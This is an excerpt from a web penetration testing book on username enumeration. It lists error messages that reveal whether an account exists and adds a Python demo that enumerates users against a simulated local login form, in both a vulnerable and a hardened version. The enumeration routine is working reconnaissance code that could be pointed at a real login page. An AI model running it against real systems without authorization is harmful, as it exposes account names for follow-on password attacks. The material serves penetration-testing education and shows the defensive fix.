Web Penetration Testing with Kali Linux - Third Edition by Juned Ahmed Ansari, Gilberto Najera-Gutierrez

Username enumeration

In black box and gray box penetration testing scenarios, discovering a list of valid users for an application may be one of the first steps, especially when the application is not a commercial or off-the-shelf product, since for those you can often look up the default user accounts online.

Enumerating users in a web application is done by analyzing the responses returned when usernames are submitted to places such as login, registration, and password recovery pages. If the response for an existing username differs in any way (error message, status code, response length, or even response time) from the response for a username that does not exist, you can enumerate users. Some common error messages that give away whether a submitted username exists are:

  • "User foo: invalid password"
  • "invalid user ID"
  • "account disabled"
  • "this user is not active"
  • "invalid user"
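The following is an added example, not code from the book: it simulates a login form that behaves like the messages above (a distinct error for a wrong password versus an unknown user) and runs a small enumeration routine against it, then repeats the run against a hardened version of the same form that returns one generic message. The account names and passwords, the `/login` path, and the form field names are constructed for the demonstration; against a real target you would point `enumerate_users` at the actual login URL and supply the form's real parameter names.

```python
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Constructed sample accounts for the simulated target; not real credentials.
ACCOUNTS = {"admin": "S3cret!", "alice": "hunter2"}
CANDIDATES = ["admin", "alice", "bob", "root"]  # constructed wordlist


class LoginHandler(BaseHTTPRequestHandler):
    """Minimal login endpoint. With generic_errors=False it leaks whether an
    account exists through distinct messages, like the ones listed above."""
    generic_errors = False

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = form.get("username", [""])[0]
        password = form.get("password", [""])[0]
        if user in ACCOUNTS and ACCOUNTS[user] == password:
            self._reply(200, "Welcome")
        elif self.generic_errors:           # hardened: same answer either way
            self._reply(401, "Invalid username or password")
        elif user not in ACCOUNTS:          # vulnerable: unknown user
            self._reply(401, "invalid user")
        else:                               # vulnerable: known user, bad password
            self._reply(401, f"User {user}: invalid password")

    def _reply(self, status, body):
        data = body.encode()
        self.send_response(status)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_server(generic_errors=False):
    """Start the simulated target on an ephemeral local port; return (server, login URL)."""
    handler = type("Handler", (LoginHandler,), {"generic_errors": generic_errors})
    server = ThreadingHTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, f"http://127.0.0.1:{server.server_address[1]}/login"


def probe(login_url, username, password="wrong-password"):
    """Submit one login attempt and return its (status, body) fingerprint.
    The username is masked in the body so a page that merely echoes it back
    does not look different for every candidate."""
    data = urllib.parse.urlencode({"username": username, "password": password}).encode()
    req = urllib.request.Request(login_url, data=data, method="POST")
    try:
        with urllib.request.urlopen(req) as resp:
            status, body = resp.status, resp.read().decode()
    except urllib.error.HTTPError as err:   # 4xx/5xx still carry the message
        status, body = err.code, err.read().decode()
    return status, body.replace(username, "<user>")


def enumerate_users(login_url, candidates, baseline="zz-no-such-user-8f3a"):
    """Compare each candidate's response with the response for a username that
    certainly does not exist. Any deviation marks the candidate as existing."""
    base = probe(login_url, baseline)
    return [name for name in candidates if probe(login_url, name) != base]


def run_enumeration(generic_errors, candidates=CANDIDATES):
    """Spin up the target in the chosen mode, enumerate, and tear it down."""
    server, url = start_server(generic_errors)
    try:
        return enumerate_users(url, candidates)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print("vulnerable form, users found:", run_enumeration(False))
    print("hardened form, users found:  ", run_enumeration(True))
```

Against the vulnerable form the routine reports `admin` and `alice`; against the hardened form it reports nothing, because every failed attempt produces a byte-identical response. On a real engagement, extend the fingerprint with the response time and any redirect target, since an application that fixes its error text may still spend measurably longer verifying a password hash for accounts that exist.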

Let's review a very simple example on how to discover valid usernames from ...
